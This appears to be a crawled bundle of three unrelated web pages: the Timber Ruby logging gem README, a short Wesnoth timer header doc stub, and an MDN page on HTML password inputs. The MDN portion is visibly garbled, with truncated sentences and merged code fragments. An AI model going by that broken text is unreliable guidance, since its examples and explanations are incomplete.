en
refinedweb
🌲 Timber - Log Better. Solve Problems Faster.

Overview

Timber for Ruby is a drop-in replacement for your logger. It takes a different approach to structured logging. Instead of parsing, which relies on non-standard, unreadable, hard to use text logs, Timber integrates directly with your application, augmenting your logs with rich metadata and context. It automatically transforms your logs into rich events, fundamentally changing the way you use your logs.

- Easy setup - bundle exec timber install
- Seamlessly integrates with popular libraries and frameworks
- Modern fast console, designed specifically for your application

Installation

In your Gemfile, add the timber gem:

gem 'timber', '~> 2.1'

In your shell, run bundle install

In your shell, run bundle exec timber install

Usage

Basic logging

Use the `Timber::Logger` just like you would `::Logger`:

```ruby
logger.info("My log message") # use warn, error, debug, etc.

# => My log message @metadata {"level": "info", "context": {...}}
```

---

Custom events

Custom events allow you to extend beyond events already defined in the [`Timber::Events`](lib/timber/events) namespace.

```ruby
logger.warn "Payment rejected", payment_rejected: {customer_id: "abcd1234", amount: 100, reason: "Card expired"}

# => Payment rejected @metadata {"level": "warn", "event": {"payment_rejected": {"customer_id": "abcd1234", "amount": 100, "reason": "Card expired"}}, "context": {...}}
```

* Notice the `:payment_rejected` root key. Timber will classify this event as such.
* In the Timber console, use a query like `type:payment_rejected` or `payment_rejected.amount:>100`.
* See more details on our custom events docs page.

---

Custom contexts

Context is additional data shared across log lines. Think of it like log join data. This is how a query like `context.user.id:1` can show you all logs generated by that user. Custom contexts allow you to extend beyond contexts already defined in the [`Timber::Contexts`](lib/timber/contexts) namespace.

```ruby
logger.with_context(build: {version: "1.0.0"}) do
  logger.info("My log message")
end

# => My log message @metadata {"level": "info", "context": {"build": {"version": "1.0.0"}}}
```

* Notice the `:build` root key. Timber will classify this context as such.
* In the Timber console, use queries like `build.version:1.0.0`.
* See more details on our custom contexts docs page.

---

Metrics & Timings

Aggregates destroy details, and with Timber capturing metrics and timings is just logging events. Timber is built on modern big-data principles; it can calculate aggregates across terabytes of data in seconds. Don't reduce the quality of your log data to accommodate a restrictive logging system.

Here's a timing example. Notice how Timber automatically calculates the time and adds the timing to the message.

```ruby
timer = Timber::Timer.start
# ... code to time ...
logger.info("Processed background job", background_job: timer)

# => Processed background job in 54.2ms @metadata {"level": "info", "event": {"background_job": {"time_ms": 54.2}}}
```

And of course, `time_ms` can also take a `Float` or `Fixnum`:

```ruby
logger.info("Processed background job", background_job: {time_ms: 45.6})
```

Lastly, metrics aren't limited to timings. You can capture any metric you want:

```ruby
logger.info("Credit card charged", credit_card_charge: {amount: 123.23})

# => Credit card charged @metadata {"level": "info", "event": {"credit_card_charge": {"amount": 123.23}}}
```

In Timber you can easily sum, average, min, and max the `amount` attribute across any interval you desire.
Configuration

Below are a few popular configuration options; for a comprehensive list, see Timber::Config.

Logrageify. Silence noisy logs (sql query, template renders)

Timber allows you to silence noisy logs that aren't of value to you, just like lograge. In fact, we've provided a convenience method for anyone transitioning from lograge:

```ruby
# config/initializers/timber.rb
config = Timber::Config.instance
config.logrageify!()
```

It turns the usual multi-line Rails request output into this:

```
Get "/" sent 200 OK in 79ms @metadata ...
```

Internally this is equivalent to:

```ruby
# config/initializers/timber.rb
config = Timber::Config.instance
config.integrations.action_controller.silence = true
config.integrations.action_view.silence = true
config.integrations.active_record.silence = true
config.integrations.rack.http_events.collapse_into_single_event = true
```

Feel free to deviate and customize which logs you silence. We recommend a slight deviation from lograge with the following settings:

```ruby
# config/initializers/timber.rb
config = Timber::Config.instance
config.integrations.action_view.silence = true
config.integrations.active_record.silence = true
config.integrations.rack.http_events.collapse_into_single_event = true
```

This does _not_ silence the controller call log event. This is because Timber captures the parameters passed to the controller, which are generally valuable when debugging.

For a full list of integration settings, see Timber::Config::Integrations.

---

Silence specific requests (LB health checks, etc)

The following will silence all `[GET] /_health` requests:

```ruby
# config/initializers/timber.rb
config = Timber::Config.instance
config.integrations.rack.http_events.silence_request = lambda do |rack_env, rack_request|
  rack_request.path == "/_health"
end
```

We require a block because it gives you complete control over how you want to silence requests. The first parameter is the traditional Rack env hash, the second a Rack Request object.

---

Change log formats

Simply set the formatter like you would with any other logger:

```ruby
# This is set in your various environment files
logger.formatter = Timber::Logger::JSONFormatter.new
```

Your options are:

1. `Timber::Logger::AugmentedFormatter` - (default) A human readable format that _appends_ metadata to the original log line. The Timber service can parse this data appropriately. Ex: `My log message @metadata {"level":"info","dt":"2017-01-01T01:02:23.234321Z"}`
2. `Timber::Logger::JSONFormatter` - Ex: `{"message":"My log message","level":"info","dt":"2017-01-01T01:02:23.234321Z"}`
3. `Timber::Logger::MessageOnlyFormatter` - For use in development / test. Prints logs as strings with no metadata attached. Ex: `My log message`

---

Capture custom user context

By default Timber automatically captures user context for most of the popular authentication libraries (Devise, Omniauth, and Clearance). See Timber::Integrations::Rack::UserContext for a complete list.
In cases where Timber doesn't support your strategy, or you want to customize it further, you can do so like this:

```ruby
# config/initializers/timber.rb
config = Timber::Config.instance
config.integrations.rack.user_context.custom_user_hash = lambda do |rack_env|
  user = rack_env['warden'].user
  if user
    {
      id: user.id,       # unique identifier for the user, can be an integer or string,
      name: user.name,   # identifiable name for the user,
      email: user.email, # user's email address
    }
  else
    nil
  end
end
```

*All* of the user hash keys are optional, but you must provide at least one.

---

Capture release / deploy context

Timber::Contexts::Release tracks the current application release and version. If you're on Heroku, simply enable the dyno metadata feature. If you are not, set the following environment variables and this context will be added automatically:

1. `RELEASE_COMMIT` - Ex: `2c3a0b24069af49b3de35b8e8c26765c1dba9ff0`
2. `RELEASE_CREATED_AT` - Ex: `2015-04-02T18:00:42Z`
3. `RELEASE_VERSION` - Ex: `v2.3.1`

All variables are optional, but at least one must be present.

---

Jibber-Jabber

Which log events does Timber structure for me?

Out of the box you get everything in the [`Timber::Events`](lib/timber/events) namespace. We also add context to every log, everything in the [`Timber::Contexts`](lib/timber/contexts) namespace. Context is structured data representing the current environment when the log line was written. It is included in every log line. Think of it like join data for your logs.

---

What about my current log statements?

They'll continue to work as expected. Timber adheres strictly to the default `Logger` interface and will never deviate in *any* way. In fact, traditional log statements for non-meaningful events, debug statements, etc, are encouraged. In cases where the data is meaningful, consider logging a custom event.

When to use metadata or events?

At its most basic level, both metadata and events serve the same purpose: they add structured data to your logs. And anyone that's implemented structured logging knows this can quickly get out of hand. This is why we created events. Here's how we recommend using them:

1. Use `events` when the log cleanly maps to an event that you'd like to alert on, graph, or use in a meaningful way. Typically something that is core to your business or application.
2. Use metadata for debugging purposes; when you simply want additional insight without polluting the message.

### Example 1: Logging that a payment was rejected

This is clearly an event that is meaningful to your business. You'll probably want to alert and graph this data. So let's log it as an official event:

```ruby
logger.info("Payment rejected", payment_rejected: {customer_id: "xiaus1934", amount: 1900, currency: "USD"})
```

### Example 2: Logging that an email was changed

This is definitely log worthy, but not something that is core to your business or application. Instead of an event, use metadata:

```ruby
logger.info("Email successfully changed", old_email: old_email, new_email: new_email)
```

---
https://www.rubydoc.info/github/timberio/timber-ruby
CC-MAIN-2019-35
en
refinedweb
Contains the gui2 timer routines.

Includes "utils/functional.hpp" and SDL2 headers.

Since the callback is a std::function object, it's possible to make the callback as fancy as wanted.

Definition in file timer.hpp.
http://devdocs.wesnoth.org/timer_8hpp.html
CC-MAIN-2019-35
en
refinedweb
password.

Note: Any forms involving sensitive information like passwords (e.g. login forms) should be served over HTTPS. Many browsers now implement mechanisms to warn against insecure login forms; see Insecure passwords.

Value

Note: The line feed (U+000A) and carriage return (U+000D) characters are not permitted in a password value. When setting the value of a password control, line feed and carriage return characters are stripped out of the value.

Additional attributes

In addition to the attributes that operate on all <input> elements regardless of their type, password field inputs support the following attributes:

maxlength
The maximum number of characters (as UTF-16 code units) the user can enter into the password field. This must be an integer value 0 or higher. If no maxlength is specified, or an invalid value is specified, the password input has no maximum length.

minlength
The minimum number of characters (as UTF-16 code units) the user can enter into the password entry field. This must be a non-negative integer value smaller than or equal to the value specified by maxlength. If no minlength is specified, or an invalid value is specified, the password input has no minimum length.

pattern
A regular expression that the entered value must match in order for the input to pass constraint validation. Use of a pattern is strongly recommended for password inputs, in order to help ensure that valid passwords using a wide assortment of character classes are selected and used by your users. With a pattern, you can mandate case rules, require the use of some number of digits and/or punctuation characters, and so forth.

Using password inputs

Password input boxes generally work just like other textual input boxes; the main difference is the obscuring of the content to prevent people near the user from reading the password.

A simple password input

Here we see the most basic password input, with a label established using the <label> element.

<label for="userPassword">Password: </label>
<input id="userPassword" type="password">

Allowing autocomplete

To allow the user's password manager to automatically enter the password, specify the autocomplete attribute. For passwords, this should typically be one of the following:

on - Allow the browser or a password manager to automatically fill out the password field. This isn't as informative as using either current-password or new-password.

off - Don't allow the browser or password manager to automatically fill out the password field. Note that some software ignores this value, since it's typically harmful to users' ability to maintain safe password practices.

current-password - Allow the browser or password manager to enter the current password for the site. This provides more information than on does, since it lets the browser or password manager automatically enter the currently-known password for the site in the field, but not suggest a new one.

new-password - Allow the browser or password manager to automatically enter a new password for the site; this is used on "change your password" and "new user" forms, on the field asking the user for a new password. The new password may be generated in a variety of ways, depending on the password manager in use. It may simply fill in a new suggested password, or it might show the user an interface for creating one.

<label for="userPassword">Password:</label>
<input id="userPassword" type="password" autocomplete="current-password">

Making the password mandatory

To tell the user's browser that the password field must have a valid value before the form can be submitted, simply specify the Boolean required attribute.
<label for="userPassword">Password: </label> <input id="userPassword" type="password" required> <input type="submit" value="Submit"> Specifying an input mode. If the PIN is for one-time use, set the autocomplete attribute to off to suggest that it's not saved. <label for="pin">PIN: </label> <input id="pin" type="password" inputmode="numeric"> Setting length requirements"> Selecting text As with other textual entry controls, you can use the select() method to select all the text in the password field. HTML <label for="userPassword">Password: </label> <input id="userPassword" type="password" size="12"> <button id="selectAll">Select All</button> JavaScript document.getElementById("selectAll").onclick = function() { document.getElementById("userPassword").select(); } Result. Validation" autocomplete="new-password"> disabled This Boolean attribute indicates that the password field is not available for interaction. Additionally, disabled field values aren't submitted with the form. Examples Requesting a Social Security number This example only accepts input which matches the format for a valid United States Social Security Number. These numbers, used for tax and identification purposes in the US, are in the form "123-45-6789". Assorted rules for what values are permitted in each group exist as well. HTML <label for="ssn">SSN:</label> <input type="password" id="ssn" inputmode="numeric". The inputmode is set to numeric and session restore features trying to set its value, since this isn't a password at all. JavaScript; } Result Specifications Browser compatibility Legend - Full support - Full support - No support - No support - Compatibility unknown - Compatibility unknown - Non-standard. Expect poor cross-browser support. - Non-standard. Expect poor cross-browser support.
https://developer.cdn.mozilla.net/de/docs/Web/HTML/Element/input/password
CC-MAIN-2019-35
en
refinedweb